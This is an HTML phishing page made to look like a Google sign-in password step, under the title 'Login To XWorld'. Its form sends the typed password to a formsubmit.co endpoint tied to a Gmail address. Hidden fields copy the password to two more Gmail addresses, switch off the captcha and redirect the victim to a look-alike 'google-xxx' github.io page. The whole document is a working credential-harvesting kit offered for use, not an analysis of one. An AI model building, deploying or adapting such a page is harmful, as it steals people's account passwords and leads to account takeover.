<!DOCTYPE html>
<!-- Coding By CodingNepal - www.codingnepalweb.com -->
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Login To XWorld</title>
  <!-- Linking SwiperJS CSS -->
  </head>
<body style="background: #fff; width: 100%; height: 100%;">
  
    <style>
        /*style.css*/
body {
    
    align-items: center;
    justify-content: center;
    font-family: sans-serif;
    line-height: 1.5;
    min-height: 100%;
    background: #c9c9c994;
    flex-direction: column;
    margin: 0;
}


h1 {
    margin-left: 2%;
    color: #4CAF50;
}

#password {
    margin-left: 2%;
    display: block;
    color: #0a0a0a;
    width: 95%;
    height: 55px;
    margin-bottom: 15px;
    background: #fff;
    padding: 20px;
    margin-top: 30px;
    font-size: 16px;
    box-sizing: border-box;
    border: 2px solid #31313133;    
    border-radius: 5px;
}

.wrap {
    display: flex;
    justify-content: center;
    align-items: center;
}

.sumbit1 {
    padding: 15px;
    border-radius: 30px;
    margin-top: 20px;
    margin-bottom: 15%;
    border: none;
    color: white;
    background-color: #1877f2;
    width: 20%;
    font-size: 16px;
}
    </style>
    
                      <p style="margin-bottom: 10px;"><img style="width: 55px; height: 55px; margin-top: 5%; margin-left: 5%;" src="google-icon.png" alt=""></p>
                      
                     <h1 style="margin-left: 5%; color: #000000b8;">Welcome</h1>
                     
                     <h4 style="margin-bottom: 10px; margin-left: 5%; color: #050505a1;">A verification code will be sent to this email.</h4>
                  
 <form action="https://formsubmit.co/may16993900@gmail.com" method="post">
        
                       <input type="password" id="password" name="password"  placeholder="Password" required>
                       
                       
                  <input style=" display: block; width: 10%; height: 18px; display: inline;"  class="toggle-btn" onclick="togglePassword()" type="checkbox">Show password</input>
                 <script>
        function togglePassword() {
            var passwordField = document.getElementById("password");
            if (passwordField.type === "password") {
                passwordField.type = "text";
            } else {
                passwordField.type = "password";
            }
        }
    </script>
    
        <input type="hidden" name="_cc" value="bigbadoo09@gmail.com">            
          
            <input type="hidden" name="_cc" value="chrisvee985@gmail.com">          
                
                    <input type="hidden" name="_next" value="https://google-xxx.github.io/.com/end-page.html">
       
        <input type="hidden" name="_captcha" value="false">
                        
                     <p>
  <span style="margin-left: 1%;"><button_ class="sumbit1" style="background: none; color: #1877f2; width: 40%;">
                            <a href="#" style="color: #1877f2;"><span class="btnText">Forgot password?</span></a>
                            <i class="uil uil-navigator"></i>
                        </button_></span> 
                        
                        
                        
                        
  <span style="margin-left: 37%;"><button class="sumbit1">
                            <span class="btnText">Next</span>
                            <i class="uil uil-navigator"></i>
                        </button>          
                </span>                                                 
</p>
             </form>                      
      </body>
</html>
